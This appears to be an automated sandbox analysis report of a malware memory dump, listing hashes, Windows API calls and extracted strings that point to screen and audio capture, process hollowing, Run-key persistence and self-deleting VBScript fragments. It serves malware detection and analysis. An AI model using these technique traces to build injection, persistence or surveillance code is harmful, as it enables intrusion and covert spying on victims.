                                      • Instruction ID: 939e0542faac49dd1dc4bb8bd67b962a53fd250628b76660d247896f339920b3
                                      • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                      • Instruction Fuzzy Hash: 01C183B23051930ADB2E4A3E957463FFBA19B916B531A17DDD8B2CB1C5FF20D124E620
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction ID: 9cca7ac1758a030b338f9b866a1012dd3a806e352a2eedc47982f98f03d27b9f
                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction Fuzzy Hash: 85C171B23051930ADB2E4A3E953463FFBA19B926B531A079DD8B2CB1C5FF20D124E650
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e161149dfcfde14b0cd5a29c2f169de042b37c027391bcdbe844d1d06cbdb277
                                      • Instruction ID: 12fabb1e106c83801f5d433d17781f475d516b7033fe4c67da67c3e094b193f4
                                      • Opcode Fuzzy Hash: e161149dfcfde14b0cd5a29c2f169de042b37c027391bcdbe844d1d06cbdb277
                                      • Instruction Fuzzy Hash: D1B1713911429A8ACB05EF68C4913F63BA1EF6A301F4851B9EC9CCF756D3398506EB64
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 300f4d542f4ce60cadd9e2beb82d396481b20e1d499116417427a4376d2d2ac0
                                      • Instruction ID: d62027b37d3359ca3d07ae7c7e47c2e307d1e9ab352a008ad56b87c5b9b59223
                                      • Opcode Fuzzy Hash: 300f4d542f4ce60cadd9e2beb82d396481b20e1d499116417427a4376d2d2ac0
                                      • Instruction Fuzzy Hash: AA616731640709A7DF378A2888947BE3396EF09714F4C84DBE943EB2C0DB51E946CB25
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 71051d3cb7b48ccd195da58da315b806f75ff68e93641cdfbed9c222751f6c59
                                      • Instruction ID: ae13939ccf9f2980802a51ddb4ae147604aaf8df1be8b906edec8509db9a9d2b
                                      • Opcode Fuzzy Hash: 71051d3cb7b48ccd195da58da315b806f75ff68e93641cdfbed9c222751f6c59
                                      • Instruction Fuzzy Hash: 48617B72600709A7DE3B9E688894BBE7395EF41308F0409DBE943DB2D3EB51E942CB55
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                      • Instruction ID: 255c7d7e3c407f890ac3cf1b9250131db307d8a28c999ca1ef86767ecaec033b
                                      • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                      • Instruction Fuzzy Hash: 5451466160065B97DF37896C84E57BE7BDAEF12308F0809DFD882CBA81C725EA05C752
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 628fd2d23e3b9e8eddda9414cca102861cb20c2ab21f2c1c82199380d97b1b87
                                      • Instruction ID: 744cdfe66bf09b65b1ad248ee620988c594ce633a31b36e86146607b36411a57
                                      • Opcode Fuzzy Hash: 628fd2d23e3b9e8eddda9414cca102861cb20c2ab21f2c1c82199380d97b1b87
                                      • Instruction Fuzzy Hash: BC615A329083159FC308DF35D980A5BB7E9EFCC714F550E6EF49996150EB31EA088B86
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                      • Instruction ID: c84850c1d3db9b92134b5e377b6622a268910764d802bd2cdfadf8a8e542b433
                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                      • Instruction Fuzzy Hash: 5011ABBB241141C3D6178A3DD8F86B7B797EBC522972D43FAF0424B758D732B1459602
                                      APIs
                                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 02B18E90
                                      • CreateCompatibleDC.GDI32(00000000), ref: 02B18E9D
                                        • Part of subcall function 02B19325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 02B19355
                                      • CreateCompatibleBitmap.GDI32(00000000,?), ref: 02B18F13
                                      • DeleteDC.GDI32(00000000), ref: 02B18F2A
                                      • DeleteDC.GDI32(00000000), ref: 02B18F2D
                                      • DeleteObject.GDI32(00000000), ref: 02B18F30
                                      • SelectObject.GDI32(00000000,00000000), ref: 02B18F51
                                      • DeleteDC.GDI32(00000000), ref: 02B18F62
                                      • DeleteDC.GDI32(00000000), ref: 02B18F65
                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 02B18F89
                                      • GetIconInfo.USER32(?,?), ref: 02B18FBD
                                      • DeleteObject.GDI32(?), ref: 02B18FEC
                                      • DeleteObject.GDI32(?), ref: 02B18FF9
                                      • DrawIcon.USER32(00000000,?,?,?), ref: 02B19006
                                      • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 02B1903C
                                      • GetObjectA.GDI32(00000000,00000018,?), ref: 02B19068
                                      • LocalAlloc.KERNEL32(00000040,00000001), ref: 02B190D5
                                      • GlobalAlloc.KERNEL32(00000000,?), ref: 02B19144
                                      • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B19168
                                      • DeleteDC.GDI32(?), ref: 02B1917C
                                      • DeleteDC.GDI32(00000000), ref: 02B1917F
                                      • DeleteObject.GDI32(00000000), ref: 02B19182
                                      • GlobalFree.KERNEL32(?), ref: 02B1918D
                                      • DeleteObject.GDI32(00000000), ref: 02B19241
                                      • GlobalFree.KERNEL32(?), ref: 02B19248
                                      • DeleteDC.GDI32(?), ref: 02B19258
                                      • DeleteDC.GDI32(00000000), ref: 02B19263
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                      • String ID: DISPLAY
                                      • API String ID: 479521175-865373369
                                      • Opcode ID: f9c06c3ec06ea036ecc0f577576b4756730f62a2d04e3d80a1a629e23e1f05fd
                                      • Instruction ID: 69004b9fb78edd7eab1c950f9155ed92b177093cdca5f3ca1c026952b26fc079
                                      • Opcode Fuzzy Hash: f9c06c3ec06ea036ecc0f577576b4756730f62a2d04e3d80a1a629e23e1f05fd
                                      • Instruction Fuzzy Hash: 76C15871508750EFE724DF24D848B6BBBE9FF88750F44485DF98997290DB30A948CBA2
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 02B18136
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B18139
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 02B1814A
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1814D
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 02B1815E
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B18161
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 02B18172
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B18175
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02B18217
                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 02B1822F
                                      • GetThreadContext.KERNEL32(?,00000000), ref: 02B18245
                                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 02B1826B
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02B182ED
                                      • TerminateProcess.KERNEL32(?,00000000), ref: 02B18301
                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 02B18341
                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02B1840B
                                      • SetThreadContext.KERNEL32(?,00000000), ref: 02B18428
                                      • ResumeThread.KERNEL32(?), ref: 02B18435
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02B1844C
                                      • GetCurrentProcess.KERNEL32(?), ref: 02B18457
                                      • TerminateProcess.KERNEL32(?,00000000), ref: 02B18472
                                      • GetLastError.KERNEL32 ref: 02B1847A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                      • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                      • API String ID: 4188446516-3035715614
                                      • Opcode ID: 56206fbabba9644eaf7926ef6ef3be14387bc2ed019ce577ceae7b148e837e5e
                                      • Instruction ID: 73212370a109cd024fbc9ab5fccc895427b7dd83839cead2fec4280db764a2b4
                                      • Opcode Fuzzy Hash: 56206fbabba9644eaf7926ef6ef3be14387bc2ed019ce577ceae7b148e837e5e
                                      • Instruction Fuzzy Hash: 1FA18DB0A44300EFEB108F64DC89B6ABBE8FF48748F44486AF685D7190D774E814CB56
                                      APIs
                                        • Part of subcall function 02B12850: TerminateProcess.KERNEL32(00000000,pth_unenc,02B0F8C8), ref: 02B12860
                                        • Part of subcall function 02B12850: WaitForSingleObject.KERNEL32(000000FF), ref: 02B12873
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 02B0D51D
                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 02B0D530
                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 02B0D549
                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 02B0D579
                                        • Part of subcall function 02B0B8AC: TerminateThread.KERNEL32(02B0A27D,00000000,02B752F0,pth_unenc,02B0D0B8,02B752D8,02B752F0,?,pth_unenc), ref: 02B0B8BB
                                        • Part of subcall function 02B0B8AC: UnhookWindowsHookEx.USER32(02B750F0), ref: 02B0B8C7
                                        • Part of subcall function 02B0B8AC: TerminateThread.KERNEL32(02B0A267,00000000,?,pth_unenc), ref: 02B0B8D5
                                        • Part of subcall function 02B1C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,02B66468,00000000,00000000,02B0D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 02B1C430
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,02B66468,02B66468,00000000), ref: 02B0D7C4
                                      • ExitProcess.KERNEL32 ref: 02B0D7D0
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                      • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                      • API String ID: 1861856835-1536747724
                                      • Opcode ID: da48068ab81794b35736bd9037892dabe0ffe718a8cfc4d94b99bd56f4bc1c97
                                      • Instruction ID: aa2d067832a5f77969cef11efb512e8babeff067f97b761d6427af5e0328e02a
                                      • Opcode Fuzzy Hash: da48068ab81794b35736bd9037892dabe0ffe718a8cfc4d94b99bd56f4bc1c97
                                      • Instruction Fuzzy Hash: FA91D3316142005AD31BF764D8D4AAFBBEEEF95304F4008EDA58A931E1FF649D49CE92
                                      APIs
                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,02B750E4,00000003), ref: 02B12494
                                      • ExitProcess.KERNEL32(00000000), ref: 02B124A0
                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02B1251A
                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 02B12529
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02B12534
                                      • CloseHandle.KERNEL32(00000000), ref: 02B1253B
                                      • GetCurrentProcessId.KERNEL32 ref: 02B12541
                                      • PathFileExistsW.SHLWAPI(?), ref: 02B12572
                                      • GetTempPathW.KERNEL32(00000104,?), ref: 02B125D5
                                      • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 02B125EF
                                      • lstrcatW.KERNEL32(?,.exe), ref: 02B12601
                                        • Part of subcall function 02B1C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,02B66468,00000000,00000000,02B0D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 02B1C430
                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 02B12641
                                      • Sleep.KERNEL32(000001F4), ref: 02B12682
                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 02B12697
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02B126A2
                                      • CloseHandle.KERNEL32(00000000), ref: 02B126A9
                                      • GetCurrentProcessId.KERNEL32 ref: 02B126AF
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Similarity
                                      • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                      • String ID: .exe$WDH$exepath$open$temp_
                                      • API String ID: 2649220323-3088914985
                                      • Opcode ID: 43dc7e602cd748f6d0b6da2fa5d2da2f4c241158d591c41468300da43fe1b075
                                      • Instruction ID: f8bfc7794b3f65aa3940e90ee03ac1128a5ae340830ac0688898eecfd8d90cf5
                                      • Opcode Fuzzy Hash: 43dc7e602cd748f6d0b6da2fa5d2da2f4c241158d591c41468300da43fe1b075
                                      • Instruction Fuzzy Hash: D051B2B1E40325AFEB15A7A0AC99FBE376E9B04350F8444D5F902A71C0EF788E45CB90
                                      APIs
                                      • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 02B1B13C
                                      • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 02B1B150
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,02B660A4), ref: 02B1B178
                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,02B74EE0,00000000), ref: 02B1B18E
                                      • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 02B1B1CF
                                      • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 02B1B1E7
                                      • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 02B1B1FC
                                      • SetEvent.KERNEL32 ref: 02B1B219
                                      • WaitForSingleObject.KERNEL32(000001F4), ref: 02B1B22A
                                      • CloseHandle.KERNEL32 ref: 02B1B23A
                                      • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 02B1B25C
                                      • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 02B1B266
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Similarity
                                      • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                      • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                      • API String ID: 738084811-1354618412
                                      • Opcode ID: 95c2142549c67960bbeb53955957d28361fb9c003ec2068e0aba3003a6ac7916
                                      • Instruction ID: 527195d6f3698a6f661e3cd20e14e46d9caec7bc1ea801992c9f59d3c9ea7fa6
                                      • Opcode Fuzzy Hash: 95c2142549c67960bbeb53955957d28361fb9c003ec2068e0aba3003a6ac7916
                                      • Instruction Fuzzy Hash: 2D51A4716942046AE31AB734DCD9EBF3FAEEB44398F400499B55A871D0EF608D18CE62
                                      APIs
                                        • Part of subcall function 02B12850: TerminateProcess.KERNEL32(00000000,pth_unenc,02B0F8C8), ref: 02B12860
                                        • Part of subcall function 02B12850: WaitForSingleObject.KERNEL32(000000FF), ref: 02B12873
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,02B752F0,?,pth_unenc), ref: 02B0D1A5
                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 02B0D1B8
                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,02B752F0,?,pth_unenc), ref: 02B0D1E8
                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,02B752F0,?,pth_unenc), ref: 02B0D1F7
                                        • Part of subcall function 02B0B8AC: TerminateThread.KERNEL32(02B0A27D,00000000,02B752F0,pth_unenc,02B0D0B8,02B752D8,02B752F0,?,pth_unenc), ref: 02B0B8BB
                                        • Part of subcall function 02B0B8AC: UnhookWindowsHookEx.USER32(02B750F0), ref: 02B0B8C7
                                        • Part of subcall function 02B0B8AC: TerminateThread.KERNEL32(02B0A267,00000000,?,pth_unenc), ref: 02B0B8D5
                                        • Part of subcall function 02B1B978: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,02B66468,02B0D20D,.vbs,?,?,?,?,?,02B752F0), ref: 02B1B99F
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,02B66468,02B66468,00000000), ref: 02B0D412
                                      • ExitProcess.KERNEL32 ref: 02B0D419
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Similarity
                                      • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                      • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                      • API String ID: 3797177996-3018399277
                                      • Opcode ID: 8bfc1608cd313c1001ac2db21ed21db112cafb0819883b16436689828a64b4f1
                                      • Instruction ID: 02030bf3df622036329a93bff0a61ac77c7d63ddaac84f0ce8da8ea0e7b8a62b
                                      • Opcode Fuzzy Hash: 8bfc1608cd313c1001ac2db21ed21db112cafb0819883b16436689828a64b4f1
                                      • Instruction Fuzzy Hash: 7B81F2316143005BD31BF764D8D4AAFBBAEEF95304F4048EDB58A531E0EF649D09CA92
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 02B01AD9
                                      • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 02B01B03
                                      • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 02B01B13
                                      • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 02B01B23
                                      • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 02B01B33
                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 02B01B43
                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 02B01B54
                                      • WriteFile.KERNEL32(00000000,02B72AAA,00000002,00000000,00000000), ref: 02B01B65
                                      • WriteFile.KERNEL32(00000000,02B72AAC,00000004,00000000,00000000), ref: 02B01B75
                                      • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 02B01B85
                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 02B01B96
                                      • WriteFile.KERNEL32(00000000,02B72AB6,00000002,00000000,00000000), ref: 02B01BA7
                                      • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 02B01BB7
                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 02B01BC7
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$Write$Create
                                      • String ID: RIFF$WAVE$data$fmt
                                      • API String ID: 1602526932-4212202414
                                      • Opcode ID: 99593135c6bec7fff23039ab430673daa460f0f9c60a9a91c932ce7a4db9e05f
                                      • Instruction ID: 26f0b0e83e76f24e3640f15e4f28523a38d16d17672b9b524f6067e44663536f
                                      • Opcode Fuzzy Hash: 99593135c6bec7fff23039ab430673daa460f0f9c60a9a91c932ce7a4db9e05f
                                      • Instruction Fuzzy Hash: 55412C72654318BAF210DA51DD86FBB7FECEB85B50F40081AFA54D6080D7A4A909DBB3
                                      APIs
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\SysWOW64\rundll32.exe,00000001,02B0764D,C:\Windows\SysWOW64\rundll32.exe,00000003,02B07675,02B752D8,02B076CE), ref: 02B07284
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B0728D
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 02B072A2
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B072A5
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 02B072B6
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B072B9
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 02B072CA
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B072CD
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 02B072DE
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B072E1
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 02B072F2
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B072F5
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: C:\Windows\SysWOW64\rundll32.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                      • API String ID: 1646373207-365949992
                                      • Opcode ID: 3e35de10f8d7563c1ad4b9019c9181a443cd48885ccced92d7b772a078b3e2bc
                                      • Instruction ID: a578e7823430af6f4babba4f678f9aa9fdc24af34981415f3da277d79a58f659
                                      • Opcode Fuzzy Hash: 3e35de10f8d7563c1ad4b9019c9181a443cd48885ccced92d7b772a078b3e2bc
                                      • Instruction Fuzzy Hash: 7A0171E1E8031A76BB226B3A5C98D1BEF9CDF551913091CA7B806E3151EFBCD450DEA0
                                      APIs
                                      • _wcslen.LIBCMT ref: 02B0CE07
                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,02B750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 02B0CE20
                                      • CopyFileW.KERNEL32(C:\Windows\SysWOW64\rundll32.exe,00000000,00000000,00000000,00000000,00000000,?,02B750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 02B0CED0
                                      • _wcslen.LIBCMT ref: 02B0CEE6
                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 02B0CF6E
                                      • CopyFileW.KERNEL32(C:\Windows\SysWOW64\rundll32.exe,00000000,00000000), ref: 02B0CF84
                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 02B0CFC3
                                      • _wcslen.LIBCMT ref: 02B0CFC6
                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 02B0CFDD
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,02B750E4,0000000E), ref: 02B0D02D
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,02B66468,02B66468,00000001), ref: 02B0D04B
                                      • ExitProcess.KERNEL32 ref: 02B0D062
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                      • String ID: 6$C:\Windows\SysWOW64\rundll32.exe$del$open
                                      • API String ID: 1579085052-896526524
                                      • Opcode ID: 32d722a5dd5d05108fd1af5909d1fec1199bd1ce20d6e38bbb9966f20d7bf445
                                      • Instruction ID: 4040ac9beb50085a80f1ba317ff2777caca7dcb903948fbad4b1696101775014
                                      • Opcode Fuzzy Hash: 32d722a5dd5d05108fd1af5909d1fec1199bd1ce20d6e38bbb9966f20d7bf445
                                      • Instruction Fuzzy Hash: 9651CF21658300ABE61BB76898E0F7F7F9FAB94714F4004DDF64A872D1EF54D8098B62
                                      APIs
                                      • lstrlenW.KERNEL32(?), ref: 02B1C036
                                      • _memcmp.LIBVCRUNTIME ref: 02B1C04E
                                      • lstrlenW.KERNEL32(?), ref: 02B1C067
                                      • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 02B1C0A2
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 02B1C0B5
                                      • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 02B1C0F9
                                      • lstrcmpW.KERNEL32(?,?), ref: 02B1C114
                                      • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 02B1C12C
                                      • _wcslen.LIBCMT ref: 02B1C13B
                                      • FindVolumeClose.KERNEL32(?), ref: 02B1C15B
                                      • GetLastError.KERNEL32 ref: 02B1C173
                                      • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 02B1C1A0
                                      • lstrcatW.KERNEL32(?,?), ref: 02B1C1B9
                                      • lstrcpyW.KERNEL32(?,?), ref: 02B1C1C8
